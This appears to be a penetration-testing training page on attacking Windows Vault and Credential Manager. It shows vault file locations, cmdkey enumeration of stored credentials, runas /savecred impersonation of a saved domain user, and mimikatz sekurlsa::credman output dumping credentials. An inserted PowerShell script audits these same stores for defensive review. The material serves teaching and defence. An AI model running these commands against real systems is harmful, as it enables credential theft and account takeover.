Credential Attacks

Windows Vault and Credential Manager

Notes and commands for Windows Vault and Credential Manager.

2026-01-02
Tags: passwords, windows-vault-and-credential-manager
Vault and credential store locations:

• %UserProfile%\AppData\Local\Microsoft\Vault\
• %UserProfile%\AppData\Local\Microsoft\Credentials\
• %UserProfile%\AppData\Roaming\Microsoft\Vault\
• %ProgramData%\Microsoft\Vault\
• %SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\

Credential Manager is the user-facing feature/API, while the actual encrypted stores are the vault/locker folders listed above.

It is possible to export Windows Vaults to .crd files either via Control Panel or with the following command. Backups created this way are encrypted with a password supplied by the user and can be imported on other Windows systems.

C:\Users\sadams>rundll32 keymgr.dll,KRShowKeyMgr

We can use cmdkey to enumerate the credentials stored in the current user's profile:

C:\Users\sadams>whoami
srv01\sadams

C:\Users\sadams>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02hejubrtyqjrkfi
    Local machine persistence

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles

The first credential in the command output above, virtualapp/didlogical, is a generic credential used by Microsoft account/Windows Live services. The random-looking username is an internal account ID. This entry may be ignored for our purposes.

The second credential, Domain:interactive=SRV01\mcharles, is a domain credential associated with the user SRV01\mcharles. Interactive means that the credential is used for interactive logon sessions. Whenever we come across this type of credential, we can use runas to impersonate the stored user like so:

C:\Users\sadams>runas /savecred /user:SRV01\mcharles cmd
Attempting to start cmd as user "SRV01\mcharles"...

Stored credentials are listed in the format shown in the cmdkey output above: a Target line, a Type line, a User line and, where applicable, a persistence line.
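The following PowerShell audit script is an added example and is not part of these notes. It walks the vault/locker folders listed at the top of the page, parses cmdkey /list output in the format shown above into objects, and flags saved interactive domain credentials of the kind runas /savecred can reuse, so they can be reviewed and removed. It assumes English-language cmdkey output; the DisableDomainCreds policy check at the end goes beyond what the notes cover (it is the "Network access: Do not allow storage of passwords and credentials for network authentication" setting).

```powershell
# Added audit example (not from the original notes): inventory Windows Vault /
# Credential Manager artifacts on the local host and flag stored credentials
# that runas /savecred could reuse. Assumes English cmdkey output.

# Vault / locker folders listed in the notes above
$VaultPaths = @(
    "$env:UserProfile\AppData\Local\Microsoft\Vault",
    "$env:UserProfile\AppData\Local\Microsoft\Credentials",
    "$env:UserProfile\AppData\Roaming\Microsoft\Vault",
    "$env:ProgramData\Microsoft\Vault",
    "$env:SystemRoot\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault"
)

function Get-VaultArtifactInventory {
    foreach ($path in $VaultPaths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        # -Force: vault files are hidden; SilentlyContinue: systemprofile needs elevation
        $files = Get-ChildItem -LiteralPath $path -Recurse -Force -File -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Path      = $path
            FileCount = @($files).Count
            Newest    = ($files | Sort-Object LastWriteTime -Descending | Select-Object -First 1).LastWriteTime
        }
    }
}

function ConvertFrom-CmdkeyOutput {
    param([string[]]$Lines)
    # cmdkey /list prints one block per credential: Target / Type / User lines,
    # optionally a "... persistence" line, separated by blank lines.
    $current = $null
    foreach ($line in $Lines) {
        $trimmed = $line.Trim()
        if ($trimmed -match '^Target:\s*(.+)$') {
            if ($current) { $current }          # emit the previous block
            $current = [pscustomobject]@{ Target = $Matches[1]; Type = $null; User = $null; Persistence = $null }
        }
        elseif ($current -and $trimmed -match '^Type:\s*(.+)$') { $current.Type = $Matches[1] }
        elseif ($current -and $trimmed -match '^User:\s*(.+)$') { $current.User = $Matches[1] }
        elseif ($current -and $trimmed -match 'persistence$')   { $current.Persistence = $trimmed }
    }
    if ($current) { $current }
}

function Get-RiskyStoredCredential {
    param([string[]]$CmdkeyLines = (cmdkey /list))
    # "Domain Password" entries whose target is Domain:interactive=... are the
    # ones runas /savecred reuses; generic entries (e.g. virtualapp/didlogical) are skipped.
    ConvertFrom-CmdkeyOutput -Lines $CmdkeyLines |
        Where-Object { $_.Type -eq 'Domain Password' -and $_.Target -like 'Domain:interactive=*' } |
        ForEach-Object {
            [pscustomobject]@{
                Target  = $_.Target
                User    = $_.User
                Finding = 'Saved interactive domain password; reusable by runas /savecred. Review and remove via Credential Manager or cmdkey /delete.'
            }
        }
}

# Policy check (not covered by the notes above): when DisableDomainCreds is 1,
# Windows refuses to save domain passwords in Credential Manager at all.
function Test-DomainCredStoragePolicy {
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $value = $lsa.DisableDomainCreds
    [pscustomobject]@{
        DisableDomainCreds = $value
        Status = if ($value -eq 1) { 'Storage of domain credentials disabled' } else { 'Domain credentials may be saved (default)' }
    }
}

# Usage: run in the context of the user whose profile is being audited
Get-VaultArtifactInventory   | Format-Table -AutoSize
Get-RiskyStoredCredential    | Format-List
Test-DomainCredStoragePolicy | Format-List
```

ConvertFrom-CmdkeyOutput can also be fed saved output (for example, lines collected from several hosts by a management tool) through its -Lines parameter, which is why the parser is separate from the function that invokes cmdkey. The systemprofile vault folder is only readable with elevation; the inventory reports zero files there when run as a standard user.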

Extracting Credentials

C:\Users\Administrator\Desktop> mimikatz.exe

.#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman

...SNIP...

Authentication Id: 0; 630472 (00000000:00099ec8)
Session: RemoteInteractive from 3
User Name: mcharles
Domain: SRV01
Logon Server: SRV01
Logon Time: 4/27/2025 2:40:32 AM
SID: S-1-5-21-1340203682-1669575078-4153855890-1002
        credman:
         [00000000]
         * Username: mcharles@inlanefreight.local
         * Domain: onedrive.live.com
         * Password:...SNIP...
